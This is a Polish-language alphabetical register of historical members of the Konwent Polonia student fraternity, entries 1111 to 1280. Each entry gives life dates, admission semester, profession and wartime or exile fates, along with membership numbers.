 1111. Kazimierz Samorewicz, (1898 - 19 lipca 1985) - POW, ochotnik WP (1918 - 21), coetus II sem. 1920/21, urzędnik Izby Skarbowej w Brześciu n. Bugiem, ppor. AK [1339]
 1112. Antoni Sankiewicz, (1825 - 1863) - s. Tomasza, brat Michała (339), coetus I sem. 1847, lekarz, zginął w powst. 1863 r. [277]
 1113. Michał Sankiewicz, (1829 - 1860) - s. Tomasza, brat Antoniego (277), coetus I sem. 1849, zmarł młodo [339]
 1114. Władysław Sarnecki, (1908 - 19 czerwca 1994) - coetus I sem. 1931/32, lekarz USB, doktor medycny, po wojnie lekarz na „Batorym” [1446]
 1115. Wieńczysław Marcin Sarosiek, (1868 - ?) - s. Józefa , z pow. sokólskiego, coetus II sem. 1888, lekarz ? [1028]
 1116. Janusz Sasinowski, (1913 - 1974) - coetus I sem. 1930/31, zmarł w Poznaniu [1439]
 1117. Cezary Sawicki, (1845 - ?) - coetus II sem. 1868, adwokat w Petersburgu [661]
 1118. Leopold Sawicki, (1827 - 1898) - s. Ludwika, coetus II sem. 1852, lekarz w Opocznie, Żychlinie, działacz oświatowy [432]
 1119. Witold Sawicki, (10 (22) stycznia 1904 w Białej Cerkwi na Ukrainie - 28 lutego 1995 w Londynie) s. Klemensa (dyrektora spółdzielni “Rolnik” w Grodnie) i Janiny z Głogowskich, uczeń gimnazjum w Białej Cerkwi 1913-19, uczeń i absolwent Gimnazjum Kulwiecia w Warszawie 1919-22, ochotnik WP 1920 w 4 Pułku Strzelców Konnych, walczył pod Chodorowem, Przemyślanami, Złotą Lipą i Mołwą w Galicji Wschodniej, student prawa UW 1922-24 oraz student i absolwent prawa USB 1924-29, c. 1922 Sparta, akt. 1922-25, filister 1925, wystąpił 1925, c. II sem. 1924/25 Konwent Polonia [nr ew. 1387], sekretarz sem. let. 1927/28, wiceprezes sem. let. 1928/29, prezes 1929, absolwent Szkoły Podchorążych Rezerwy Kawalerii 1929-30, mjr rez 4 Pułku Ułanów, adwokat w Łodzi, w wojnie obronnej 1939 w 10 Pułku Ułanów Litewskich, internowany na Litwie, uciekł do Generalnej Guberni, oficer AK, odznaczony Krzyżem Walecznych, w powstaniu warszawskim walczył w Śródmieściu Południe, wzięty do niewoli 27 września 1944 i wywieziony do oflagu Sandbostel, po wyzwoleniu w II Korpusie PSZ na Zachodzie, po wojnie na emigracji w Wielkiej Brytanii, prowadził w Londynie warsztat galanterii skórzanej “Kameleon”, wieloletni prezes Koła 4 Pułku Ułanów Zaniemieńskich, ciało spopielone w Mortlake Crematorium
 1120. Bolesław Sawrynowicz, (1836 - 1905) - coetus II sem. 1858, jeden z budowniczych kolei transsyberyjskiej, zmarł w Irkucku [577]
 1121. Adolf Schaeffer (Szeffer), (1834 - po 1900) - coetus I sem. 1854, pastor.e.r. w Sielcu (gub. kielecka) [487]
 1122. Leopold August Schmidt, (1872-1944) - s. Fryderyka, coetus II sem. 1892, pastor e.a., więziony przez Niemców, zmarł wkrótce po zwolnieniu [1082]
 1123. Rudolf Schmidt, (1861 - 1938) - s. Ernesta, coetus II sem. 1882, pastor e.a. w Pabianicach, działacz oświatowy i charytatywny [881]
 1124. Saturnin Schmidt, (1881-1945) - coetus I sem. 1909, członek komisji dla ułożenia kartelu z Arkonią (1909), adwokat w Pułtusku [1225]
 1125. Hugo Schneider, (1878 - ?) - s. Alberta, z pow. płockiego, coetus I sem. 1899 [1122]
 1126. Tomasz Schneider, (1860 - przed 1927) - s. Jerzego, coetus II sem. 1885, lekarz Straży Granicznej, później w Kownie [959]
 1127. Aleksander Schöeneich, (1861 - 1939) - s. Edwarda, coetus II sem. 1881, pastor e.a. superintendent warszawski i lubelski, współzałożyciel Biblioteki Łopacińskich, obszerny dorobek publikowany [858]
 1128. Adolf Karol Schroeter, (1857 - 1916) - s. Ernesta, brat Pawła (772), coetus II sem. 1877, pastor e. a., wieloletni prefekt w Warszawie, w czasie I wojny wywieziony do Rosji, gdzie zmarł, pozostawił wspomnienia (zaginione) [770]
 1129. Paweł Schroeter, (1855 - 1935) - s. Ernesta, brat Adolfa (770), coetus II sem. 1877, kompozytor wielu pieśni konwentowych, chirurg w Pabianicach, autor podręcznika: Zarys anatomii topograficznej (W. 1922) [772]
 1130. Emil Schultz, (1856 - 1874) - z Warszawy, coetus II sem. 1873, zmarł w czasie studiów [720]
 1131. Julian Schultz (Szulc), (1820 - 1856) - coetus II sem. 1846, chirurg w Radomiu - znakomity i nowatorski operator [272]
 1132. Karol Seelig, (1823 - 1891) - coetus I sem. 1844, pastor e.a. w Babiaku i Sąpolnie [227]
 1133. Stanisław Selens, (1899 - 1940) - s. Piotra, POW, ochot. WP (1918 - 21), coetus II sem. 1919/20, wiceprezes Sądu Okręgowego w Wilnie, w niewoli sowieckiej, więziony w Kozielsku, zamordowany w Katyniu [1314]
 1134. Gustaw Selig, (1835 - ?) - coetus II sem. 1856, lekarz w Wrocławiu [525]
 1135. Karol Serini, (1875- 1931) - s. Karola, coetus II sem. 1893, pastor e.a. prof., dziekan U.W., mason [1088]
 1136. Konstanty Siedlecki, (1830 -?) - coetus I sem. 1853, zmarł zapewne wkrótce po studiach [450]

  Olgierd Siemaszko, Wilno 1930 r.

 1137. Olgierd Siemaszko, (1905 - 1982 w Warszawie) - coetus I sem. 1927/28, prawnik, urzędnik Zarządu Miasta Warszawy. Podczas wojny i po w Warszawie [1412]

 1138. Józef Wacław Siemiradzki, (1858 - 1933 we Lwowie) s. Telesfora, coetus II sem. 1878, paleontolog, geolog, prof., dziekan, rektor Uniw. Lwowskiego, członek PAU, Filister rzeczywisty Konwentu Polonia, Filister honoris causa Leopolii od 1927 [789]
 1139. Czesław Sienkiewicz, (1885 - 4 stycznia 1975) - s. Stanisława, coetus II sem. 1907, adwokat, sędzia w Wilnie, po wojnie w Olsztynie [1180]
 1140. Janusz Sieradzki, (1909 - 30 lipca 1985) - coetus II sem. 1927/28, sekr. Urzędu Morskiego w Gdyni, w czasie wojny (i po) w Zakopanem [1423]
 1141. Władysław Siarkiewicz, (1883 - ?) - z Warszawy, coetus II sem. 1907, lekarz [1181]
 1142. Leonard Dowmont-Siesicki, (1853 - ?) -s. Leonarda, ziemianin z gub. wileńskiej, coetus I sem. 1876 [747]
 1143. Mieczysław Dowmont-Siesicki, (1829 - 1899) - s. Antoniego, ziemianin, coetus I sem. 1847, za powst. 1863 r. zesłany [283]
 1144. Stanisław Siestrzeńcewicz (Bohusz), (1833 - po 1886) - ziemianian z gub. wileńskiej, coetus II sem. 1853 [470]
 1145. Lubomir Sikorski, (1912 - 1939) - coetus I sem. 1930/31, nie miał za co studiować i po III r. poszedł do wojska do służby zawodowej, poległ 10 IX 1939 r. koło wsi Tarnów n/Wisłą [1442]
 1146. Julian Siwicki, (1812 - przed 1889) - ziemianin w gub witebskiej, następnie w Kurlandii (Neu - Born), coetus II sem. 1828 [19]
 1147. Stanisław Siwicki, (1836 - ?) - coetus I sem. 1857, lekarz w Wilnie [538]
 1148. Zygmunt Siwicki, (1835 - 1866) - coetus I sem. 1856, nauczyciel gimn. w Saratowie i Niżnym Nowgorodzie [521]
 1149. Gleb Skabertin, (1912 - po 1960) -s. Antoniego, coetus I sem. 1931/32 [1448]
 1150. Bolesław Skawiński, (13 listopada 1915 - 1 sierpnia 2002 w Gdańsku) - s. Bolesława, brat Józefa (1495), coetus II sem. 1933/34, inicjator wznowienia działalności Konwentu w Gdańsku. Ziemian z Nowgrodzkiego, student wydziału prawa USB 1934-35, Szkoła Podchorążych Rezerwy Kawalerii w Grudziądzu 1935-38, ocicer zawodowy, ppor. WP, żołnierz września, ranny, odznaczony Krzyżem Walecznych, w oflagu Woldenberg , po wojnie komendant inspektoratu WIN (Wągrowiec - Wieluń). Mjr w st.sp. Reaktywator Konwent na Wybrzeżu [1483]
 1151. Józef Skawiński, (1917-1941) - s. Bolesława, brat Bolesława (1483), coetus I sem. 1936/37, ziemianin, żołnierz września (ochotnik), aresztowany przez sowietów, więziony, rozstrzelany w Mińsku (15 II) [1495]
 1152. Ignacy Skibiński, (1885 - ?) - coetus II sem. 1909, adwokat w Warszawie [1240]
 1153. Bogumił Skibniewski, (1869 - 1911) - s. Mścisława, coetus II sem. 1882, lekarz, ziemianin na Wołyniu [879]
 1154. Stefan Skierski, (1873-1948) - s. Henryka, coetus II sem. 1893, pastor e.r. , superintendent Kościoła Ref. w Polsce, red. „Jednoty”, krzyż Komandorski z Gwiazdą Polonia Restituta [1086]
 1155. Kazimierz Skirmutt, (1861- 1931) - s. Konstantego, brat Stanisława (776), coetus II sem. 1878, ks. katol., Protonotariusz Apostolski, radca kanoniczny Ambasady R.P. przy Watykanie, aktywny publicysta [794]
 1156. Stanisław Skirmutt, (1857 - po 1931) - s. Konstantego, brat Kazimierza (794), coetus II sem. 1877, autor muzyki do farsy J. Weyssenhoffa „Fuks”, ziemianin z pow. pińskiego [776]
 1157. Aleksander Skorupski, (1808 - przed 1852) - s. Aleksandra, ziemianin z Wołynia, coetus I sem. 1834 [71]
 1158. Witold Skorupski, (1904 - 1944) - ochotnik WP (1919 - 20), coetus I sem. 1924/25, architekt w Warszawie, poległ w powst. Warszawskim (10 VIII) [1381]
 1159. Stanisław Skrzendziewski, (1810 - ?) - coetus I sem. 1836, urzędnik w guberni wiatskiej [96]
 1160. Józef Skudowicz, (1858 - ?) - z Kowna, coetus II sem. 1885, farmaceuta [951]
 1161. Aleksander Skwarczewski, (1915 - 1972) - coetus I sem. 1935/36, lekarz, żołnierz AK - zastępca szefa sanitarnego Okr. Wileńskiego. Po wyzwoleniu w Łodzi [1487]
 1162. Witold Sławiński, (1829 - ?) - ziemianin z Mohylewszczyzny, coetus I sem. 1849 [333]
 1163. Konstanty Słomowski, (1810 - ?) - s. Ambrożego, z guberni kijowskiej, ziemianin, coetus II sem. 1834 [78]
 1164. Ludwik Słotwiński, (1912 - 1942) - s. Kalasantego, coetus I sem. 1932/33, ziemianin, zamordowany przez partyzantów sowieckich (12 XII) [1462]
 1165. Jan Słonicz-Słoński, (1909 - po 1950) - s. Antoniego, coetus I sem. 1931/32 [1451]
 1166. Ludwik Smogorzewski, (1837 - 1909) - coetus II sem. 1856, uczestnik powst. 1863 r., nauczyciel gimn. (Kalisz) [527]
 1167. Kazimierz Smolski, (1878 - 1911) - coetus II sem. 1901, ziemianin z Suwalszczyzny [1139]
 1168. Jan Snarski, (1809 - 1854) - coetus II sem. 1830, pastor e.r., zmarł w Birżach [29]
 1169. Kazimierz Sokołowski, (1834 - przed 1889) - s. Walentego, coetus I sem. 1851, lekarz w Pizie, Wenecji [395]
 1170. Napoleon Sokołowski, (1843 - ?) - coetus I sem. 1862, ojciec go zabrał z Dorpatu „bo dał się wciągnąć w złe towarzystwo”, później w Konstantynowskiej Szkole Wojskowej w Petersburgu [611]
 1171. Stanisław Sołtan, (1822- 1896) - s. Stanisława, ziemianin, coetus II sem. 1842, za powst. 1863 r. zesłany (jego syn, Bogdan był Arkonem) [211]
 1172. Józef Sopoćko, (1893 - 1960) - s. Ludwika, coetus II sem. 1912, ochotnik WP (1920), adwokat w Wilnie, w styczniu 1945 r. wywieziony do ZSRR, wrócił [1274]

  Władysław Sołtan, 1931 r.

 1173. Władysław Pereświet-Sołtan, (1870 - 1943) - s. Władysława, coetus I sem. 1890, ostatni przed II wojną prezes Stowarzyszenia Fililistrów Konwentu w Warszawie, Kawaler Dyplomu Zasługi i Złotej Odznaki ZPKA, ziemianin, adwokat, wojewoda warszawski, Min. Spraw Wewnętrznych [1054]

 1174. Adam Sołtwiński, (1833 - ok. 1857) - s. Ludwika, ziemianin w gub. mińskiej, coetus I sem. 1850 [353]
 1175. Maurycy Sonnenberg, (1876 - 1937) - coetus II sem. 1910, prawnik, w 1920 r. twórca i d - ca batalionu policyjnego z którym brał udział w Bitwie Warszawskiej, odznaczony Krzyżem Walecznych. Kierował Urzędem Śledczym w Warszawie [1253]
 1176. Bolesław Soroko, (1905 - 1987) - s. Karola, coetus II sem. 1926/27, sędzia w Smorgoniach, we wrześniu 1939 r. dostał się w ręce sowietów, ale uciekł z transportu kolejowego. Ppor. AK (Wil.), odznaczony Krzyżem Walecznych, po ekspatriacji na Dolnym Śląsku, adwokat. [1410]
 1177. Julian Sosnkowski, (1821 - po 1852) - coetus II sem. 1839, oficer huzarów [159]
 1178. Leszek Sożyński, (1913 - 11 czerwca 1979) - coetus I sem. 1937/38, ostatni v-prezes Konwentu w Wilnie, żołnierz AK, ppłk WP, lekarz [1500]
 1179. Adolf (Alfons?) Spleszyński, (1838 - ?) - s. Józefa, coetus I sem. 1859, pastor e.r. [590]
 1180. Maurycy Spira, (1843 - ?) - coetus I sem. 1872, lekarz [698]
 1181. Ludwik Spohr, (1850 - 1883) - coetus I sem. 1869, chemik, zmarł w Moskwie [667]
 1182. Henryk Dzierżysław Sroka, (1858 - 1942) - s. Augusta, coetus II sem. 1879, pastor e.a. superintendent augustowski [823]
 1183. Tadeusz Stacewicz, (1838 - ?) - studiował prawo w latach 1858-59, coetus II sem. 1857 [565]
 1184. Tomasz hr. Stadnicki, (1838 - 1912) - s. Juliusza, coetus I sem. 1857, poseł do Rady Państwa w Wiedniu [550]
 1185. Leonard Stankiewicz, (1894-1920) - s. Adolfa, brat Mieczysława (1291), coetus II sem. 1913, lekarz, ochotnik WP (1919 - 20), por. 64 p. piech., poległ k. wsi Nachów [1285]
 1186. Mieczysław Stankiewicz, (1892 - 1959) - s. Adolfa, brat Leonarda (1285), coetus I sem. 1914, lekarz Ostrów Wlkp., Wałbrzych [1291]
 1187. Leonard Staniewicz, (1833 - 1867) - coetus II sem. 1857, za powst. 1863 r. zesłany, zmarł na wygnaniu w gub. kostromskiej [562]
 1188. Mieczysław Stanilewicz, (1824 - 1858) - coetus II sem. 1842, lekarz [212]
 1189. Józef Stanisławski, (1876 - po 1939) - z Piotrkowa Tryb., coetus II sem. 1900, lekarz [1130]
 1190. Eugeniusz Starczewski, (1862 - 1927) - s. Leona. Ziemianin, coetus II sem. 1881, działacz polit., publicysta (Sprawa polska Kr. 1912). Krytyczny wobec R. Dmowskiego. Prezes Tow. Kresów Wschodnich [861]
 1191. Aleksander Stark, (1827 - ?) - s. Antoniego, w 1848 r. z powodów polit. usunięty z gimn. w Białymstoku, coetus I sem. 1854 [480]
 1192. Brunon Starypiński, (1850 - 1910) - s. Zygmunta, ziemianin z Podola, coetus I sem. 1870, aktywny społecznie [676]
 1193. Waldemar Starzeński, (1859 - 1904) - s. Wiktora, coetus I sem. 1879, ziemianin z Białostocczyzny [805]
 1194. Stanisław Starzyński, (1874 - 1903) - s. Bolesława, coetus II sem. 1892, uczestnik wojny anglo-burskiej 1900 r. [1081]
 1195. Eustachy Staszewski, (1848 - przed 1917) - coetus II sem. 1869, w Dorpacie brał udział w amatorskim przedstawieniu „Zemsty” jako rejent Milczek, lekarz w Wilnie [671]
 1196. Jerzy Staszewski, (1890 - 1968) - coetus II sem. 1912, adwokat w Płocku [1276]
 1197. Wincenty Statkowski, (1830 - ?) - s. Jana, jako uczeń gimnazjum w Mińsku członek Zw. Bratniej Młodzieży Litewskiej (1849), skazany na karę chłosty, coetus II sem. 1851, studiów nie ukończył [408]
 1198. Feliks Stawiski, (1836 - 1888) - s. Andrzeja, ziemianin, majątek Rembieszów w powiecie szadkowskim, coetus I sem. 1857
 1199. Włodzimierz Stawiski, (1887 - ?) - z Ukrainy, coetus I sem. 1902, lekarz [1142]
 1200. Jan Maria Stefanowicz, (1874 - ?) - z Ukrainy, coetus II sem. 1900, lekarz [1134]
 1201. Marian (Skarbek-)Stefanowski, (31 stycznia (12 II) 1897 w Petersburgu - 6 lutego 1979 w Łodzi) s. Jana i Marii ze Stefanowskich, z Wileńszczyzny, absolwent gimazjum w Rewlu (Tallinie) 1915, student Piotrogrodzkiego Instytutu Politechnicznego 1915-16, a później med. UD 1916, dr med. UW 1923, c. II sem. 1916, przewiózł majątek ruchomy K! z Dorpatu do Wilna, sanitariusz WP 1920-21, ppor. Kompanii Zapasowej Sanitarnej nr 7, po wojnie dyrektor szpitala w Święcianach, w drugiej połowie lat trzydziestych adiunkt kliniki chirurgi UW, w wojnie obronnej 1939 lekarz porucznik, w czasie okupacji lekarz i kierownik kliniki chirurgicznej Szpitala Dzieciątka Jezus, współpracował z “Rolą’ służbą zdrowia Kedywu AK, w czasie powstania chirurg w szpitalu powstańczym “Sano” przy ul. Lwowskiej 13, po wojnie w Łodzi, od 1943 prof. nadzw., od 1962 prof. zw., rektor AM w Łodzi 1955-68, dr h.c. AM w Łodzi 1970 i WAM w Łodzi 1973, prezes Towarzystwa Chirurgów Polskich, autor podręcznika chirurgii, odznaczony m.in. Krzyżem Kawalerskim, Oficerskim i Komandorskim OOP, pochowany na cmentarzu św. Wincentego na Dołach przy ul. Smutnej [nr ew. 1302]
 1202. Stanisław Stefanowski, (ok. 1872 - ?) - coetus I i II sem. 1894 [1094]
 1203. Aleksander Steinhagen, (1873-1951) - s. Aleksandra, coetus II sem. 1892, przemysłowiec, dyr. f-ki w Myszkowie, k. Zawiercia [1078]
 1204. Bohdan Stejgwiłło-Laudański, (1905 - 22 maja 1972) - s. Wincentego, coetus I sem. 1927/28, pracownik Wil. Banku Ziemskiego. B. aktywny w życiu K! tak przed wojną (uporządkował bibliotekę K!), jak i po wojnie [1415]
 1205. Henryk Stern, (1864 - ?) - z Warszawy, coetus II sem. 1883, dr chemii [908]
 1206. Leon Stępiński, (1883 - 1940) - coetus II sem. 1907, nauczyciel gimn. Wilno [1197]
 1207. Herman Stiller, (1843 - 1930), s. Edwarda, coetus I sem. 1862, nauczyciel religii (ew. augsb.) w Łodzi [608]
 1208. Jan Stockmann (Stokmann), (1820 -1869) - s. Jana, coetus I sem. 1839, pastor e.a., superintendent kaliski [150]
 1209. Józef Stokowski, (1833 - 1856) - s. Andrzeja, coetus I sem. 1851, zmarł wkrótce po studiach [384]
 1210. Jerzy Paulin Stołyhwo, (1903 - przed 1953) - s. Władysława, ochotnik WP (1920), coetus I sem. 1924/25, ranny, odznaczony Krzyżem Walecznych. Pracownik w Wil. Banku Ziemskim. Po wojnie w Poznaniu w Banku Rolnym [1383]
 1211. Leon Stortz, (1839 - 1914) - coetus I sem. 1875, lekarz, praktykował w Dorpacie, zmarł w Warszawie [732]
 1212. Adam Strawiński, (1878 - 1942) - brat Ksawerego (1144) i Antoniego (1244), coetus II sem. 1904, ziemianin z pow. słonimskiego [1162]
 1213. Alfred Strawiński, (1834 - ?) - ziemianin w gub. warszawskiej, coetus I sem. 1857 [551]
 1214. Samuel Strebejko, (1831 - po 1880) - s. Bernarda, coetus I sem. 1852, lekarz [424]
 1215. Antoni Strawiński, (1884 - 1953) - coetus II sem. 1909, brat Ksawerego (1144) i Adama (1162), ziemianin, prawnik [1244]
 1216. Ksawery Strawiński, (1879 - 1945) - brat Adama (1162) i Antoniego (1244), coetus II sem. 1902, ziemianin, w l. 1918 - 1922 por. 7 p. Strzelców Konnnych [1144]
 1217. Marian Strawiński, (1016 - 1932) - coetus I sem. 1888, lekarz w Szumsku, woj. wileńskie [1016]
 1218. Leonard Struczyński, (1818 - ok. 1866) - coetus II sem. 1840, lekarz w Radomiu [171]
 1219. Justyn Strumiłło, (1896 - 1948) - coetus II sem. 1919/20, pierwszy wileński gospodarz K!, ochot. WP (1919 - 20), ziemianin, rotmistrz rezerwy 13 p. uł. i AK, odznaczony Krzyżem Walecznych [1313]
 1220. Jan Stryjkowski, (1811 - 1845) - s. Jana, ziemianin, coetus I sem. 1832, zmarł w maj. Wojskrzyce k. Zakroczymia [34]
 1221. Adolf Strzelecki, (1823 - ?) - brat Erazma (308), coetus II sem. 1846, studiów nie skończył, mieszkał w Kijowie [268]
 1222. Erazm Strzelecki, (1824 - ?) - brat Adolfa (268), coetus I sem. 1848, lekarz, za powst. 1863 r. zesłany [308]
 1223. Karol Sturm, (1817 - ?) - z Warszawy, coetus I sem. 1834, nauczyciel muzyki w Wilnie [76]
 1224. Józef Strzemecki, (1818 - przed 1877) - s. Antoniego, coetus I sem. 1837, uczestnik spisku K. Hildebrandta, zesłany [115]
 1225. Stefan Stypiński, (1885 - po 1928) - coetus I sem. 1908, radca prawny w Min. Sprawiedliwości [1213]
 1226. Władysław Ludwik Suchodolski, (1828 - 1872) - ziemianin z Kongresówki, coetus II sem. 1848 [322]
 1227. Józef Suchorzewski, (1860 - po 1920) - s. Aleksandra, coetus II sem. 1879, inżynier (budowniczy kolei), poseł do I i II Dumy [819]
 1228. Franciszek Władysław Sulimierski, (1816 - przed 1889) - s. Michała, coetus I sem. 1839, prawnik, sędzia w Kaliszu [148]
 1229. Marian Sulżyński, (1836 - po 1907) - s. Tadeusza, coetus II sem. 1858, lekarz, właściciel sanatorium Gelendżyk k. Rostowa [581]
 1230. Restytut Sumorok, (1854 - 1929) - s. Tomasza, coetus II sem. 1873, adwokat, Prezes Sądu Apel. Wilno [721]
 1231. Adam Sumowski, (1813 - po 1856) - s. Walentego, brat Feliksa (152), ojciec Józefa (Arkonia), ziemianin, coetus I sem. 1834 [72]
 1232. Feliks Sumowski, (1817 - 1844) - s. Walentego, brat Adama (72), ziemianin, coetus I sem. 1839 [152]
 1233. Stanisław Swolkień, (1912 - 1944) - s. Witalisa, coetus I sem. 1932/33, żołnierz AK (okr. nowogr.), zaginął (?) [1457]
 1234. Konstanty Kazimierz Sylwestrowicz, (1827 - ?) - coetus I sem. 1844, urzędnik w Grodnie [228]
 1235. Stanisław Sylwestrowicz, (1833 - 1910) - s. Jana, ziemianin, coetus I sem. 1850, zesłany za powst. 1863 r. [348]
 1236. Tadeusz Syrwid, (1852 - 1904) - coetus II sem. 1871, prawnik, urzędnik bankowy w Wilnie [691]
 1237. Stanisław Szablewski, (1828 - 1883) - s. Jana, coetus I sem. 1852, lekarz w Nieświeżu [413]
 1238. Marian Szabunia, (1910 - 16 października 1979) - coetus I sem. 1930/31, aplikant adwokacki w Lidzie, pod koniec wojny zwerbowany do armii gen. Berlinga, po wojnie adwokat w Świdnicy [1435]
 1239. Bohdan Szachno, (1868 - 1955) - s. Bronisława, brat Mariana (1022), coetus II sem. 1887, V-prezes Wil. Koła Filistrów (do 1939 r.). Poseł do I Dumy (1906), działacz społ., v - prezes Zarządu Wil. Banku Ziemskiego, autor wspomnień [1001]
 1240. Julian Szachno, (1811 - 1830) - s. Andrzeja, brat Wiktora (22), coetus I sem. 1829, zmarł w czasie studiów w wyniku nieszczęśliwego wypadku [23]
 1241. Marian Szachno, (1870 - 1923) - s. Bronisława, brat Bohdana (1001), coetus II sem. 1888, ziemianin w Inflantach, POW, ochotnik WP w l. 1919 - 20 [1022]
 1242. Wiktor Szachno, (1809 - po 1866) - s. Andrzeja, brat Juliana (23), ziemianin, coetus I sem. 1829, uczestnik powstań 1831 r. i 1863 r. [22]

  Leszek Szaciłło, Bruksela 8 II 1946 r.

 1243. Leszek Stefan Tomasz Szaciłło, (1911 - 14 kwietnia 1998 w Kanadzie) - coetus I sem. 1931/32, pracownik Urzędu Wojewódzkiego w Łucku, żołnierz września, następnie PSZ na Zachodzie, po wojnie na emigracji w Kanadzie [1447]

 1244. Zbigniew Szacki, (1919 - 1964) - s. Konstantego, coetus II sem. 1937/38, ppor AK (12 Bryg. Oszmiańska), studia lekarskie dokończył po wojnie. Wyjechał na kontrakt do Kongo, gdzie zmarł [1504]
 1245. Stefan Szamota, (1852 - ?) - student medycyny, coetus II sem. 1872 [709]
 1246. Cezary Szaszkiewicz, (1857 - 1911) - s. Cezara, brat Józefa (774), Kazimierza (830) i Stanisława (853), coetus II sem. 1877, ziemianin na Wołyniu [775]
 1247. Józef Szaszkiewicz, (1856 - 1941) - s. Cezara, brat Cezarego (775), Kazimierza (830) i Stanisława (853), coetus II sem. 1877, znakomity mówca konwentowy, w składzie pierwszego SSH (1881), ziemianin na Wołyniu [774]
 1248. Kazimierz Szaszkiewicz, (1859 - 1940) - brat Józefa (774), Cezarego (775) i Stanisława (853), coetus I sem. 1880, wchodził w skład pierwszego Stałego Sądu Honorowego (1881), dr praw, ziemianin z Wołynia, mieszkał w Warszawie, później w woj. wileńskim [830]

  [Prawd. Stanisław] Szaszkiewicz, prawd. lata 80-te.

 1249. Stanisław Szaszkiewicz, (1861 - 1917) - s. Cezara, brat Józefa (nr ew. 774), Cezarego (nr ew. 775) i Kazimierza (nr ew. 830), c. I sem. 1881, ziemianin z Wołynia [nr ew. 853]

 1250. Bolesław Szayna (Szayno), (1904 - 9 listopada 1988) - ochotnik WP (1920), coetus II sem. 1922/23, ppor. AK [1358]
 1251. Jerzy Szczuka, (1898 - 1986) - s. Józefa, ochotnik WP (1918 - 21), coetus II sem. 1919/20, ziemianin, inż. rolnik. Aresztowany przez NKWD w Wilnie 13 VII 1940, wywieziony do ZSRR - wyszedł z II Korpusem, por. PSZ na Zach. (Monte Cassino, Ancona). Po wojnie na emigracji w Argentynie, wrócił do kraju [1310]
 1252. Samuel Szczyt, (1807 - ?) - ziemianin, założyciel i pierwszy senior Konwentu Polonia [9]
 1253. Kazimierz Szefer, (1861 - 1939) - s. Adolfa (488), coetus II sem. 1883, pastor e.r. w Serejach i Sielcu, płk. WP, w czasie wojny 1920 r. kapelan WP, następnie szef duszpasterstwa wojskowego [912]
 1254. Leon Szeliski, (1852 - 1931) - ziemianin, coetus II sem. 1872, założyciel Syndykatu Rolniczego Siedleckiego, radca Tow. Kredytowego Ziemskiego w Warszawie [700]
 1255. Kazimierz Szmakfefer, (1861 - 1934) - s. Józefa, coetus II sem. 1887, lekarz w Warszawie [1012]
 1256. Janusz Szemioth, (1918 - 1986) - s. Wiktora, coetus I sem. 1936/37, ostatni sekretarz K! w Wilnie, żołnierz AK (Okr. Wilno). Po wojnie notariusz, b. czynny w życiu K! [1496]
 1257. Jan Szepiatys (Šeptys), (1867 - 1941) - coetus II sem. 1889, pastor e. r. w Papilys (Litwa), redaktor miesięcznika relig. „Pasiuntynys” („Posłaniec”) [1042]
 1258. Józef Szmidecki, (1820 - 1877) - s. Fryderyka, ziemianin, coetus II sem. 1837 [130]
 1259. Krystyn Sznierstein (Schnierstein), (1821 - 1849) - s. Augusta, coetus II sem. 1840, lekarz w Radomiu, spiskowiec 1848 r. [176]
 1260. Bolesław Szokalski, (1831 - 1890) - s. Piotra, coetus II sem. 1848, lekarz, zm. w Turkiestanie [316]
 1261. Edward Szolc, (1826 - przed 1889) - coetus II sem. 1845, w 1849 r. aresztowany na granicy (szedł do powst. węgierskiego), wcielony do wojska [256]
 1262. Eryk Szołkowski, (1819 - po 1864) - s. Wincentego, coetus I sem. 1836. Uczestnik spisku Hildebrandta, ofic. ros., uczestnik powstania 1863 r. [95]
 1263. Józef Szomański, (1818 - ?) - s. Józefa, ziemianin z Wołynia, coetus II sem. 1838 [143]
 1264. Jan Szostak, (1885 - 1908) - z Wileńszczyzny, coetus II sem. 1906, popełnił samobójstwo (w Dorpacie) [1165]
 1265. Władysław Szpakowski, (1831 - 1866) - coetus I sem. 1854, lekarz w Kobryniu, za powst 1863 r., zesłany. Zmarł na zesłaniu w gub. jenisejskiej [483]
 1266. Rudolf Szreder (Schroeder), (1833 - 1861) - coetus II sem. 1853, pastor e.a. w Wiżajnach [463]
 1267. Zbigniew Sztolcman, (1905 - po 1945) - coetus I sem. 1927/28, przed wojną w Warszawie, po wojnie adwokat w Krakowie [1417]
 1268. Edward Sztremer (Ströhmer), (1868 - ?) - s. Edwarda (?), coetus II sem. 1888, z Warszawy [1026]
 1269. Józef Szukiewicz, (1862 - 1911) -s. Benedykta, coetus I sem. 1881, meteorolog, zmarł w Pułkowie [865]
 1270. Aleksander Szulc, (1828 -1866) - coetus I sem. 1847, pastor e.a. w Wiżajnach i Wierzbołowie [285]
 1271. Izydor Szulcman, (1829 - 1849) - coetus II sem. 1848, zginął w Dorpacie w wyniku pojedynku [319]
 1272. Justyn Szulski, (1817 - po 1842) - coetus I sem. 1834, nauczyciel w Słonimiu, Żytomierzu i Finlandzkim Korpusie Kadetów w Friedrichshamm [63]
 1273. Edmund Herman Szultz, (1851 - 1903) - s. Fryderyka, coetus I sem. 1869, pastor e.a., superintendent warszawski [666]
 1274. Gustaw Szwarc, (1840 - ?) - coetus I sem. 1861, mieszkał w Warszawie [605]
 1275. Henryk Szwemberger, (1882 - 1935) - coetus I sem. 1907, mjr audytor WP (1918-1926), radca Min. Reform Roln. [1175]
 1276. Władysław Szwengruben, (1863 - 1928) - coetus II sem. 1887, lekarz w Wilnie [1004]
 1277. Stefan Szwentner, (1894 - 1958) - coetus I sem. 1915, adwokat w Lublinie [1299]
 1278. Andrzej Szwykowski, (1909 w Petersburgu - 1944) s. Ludwika, coetus I sem. 1931/32, pracownik Banku Gosp. Krajowego w Gdyni, ppor. WP, żołnierz września, AK (obw. Baranowicze), zamordowany przez NKWD w Baranowiczach (7 VI) [1453]
 1279. Konstanty Szwykowski, (1828 - po 1873) - s. Franciszka, coetus I sem. 1850, lekarz w Oszmianie [363]
 1280. Józef Szydłowski, (1850 - 1877) - s. Kazimierza, coetus II sem. 1869, lekarz w Dyneburgu [670]
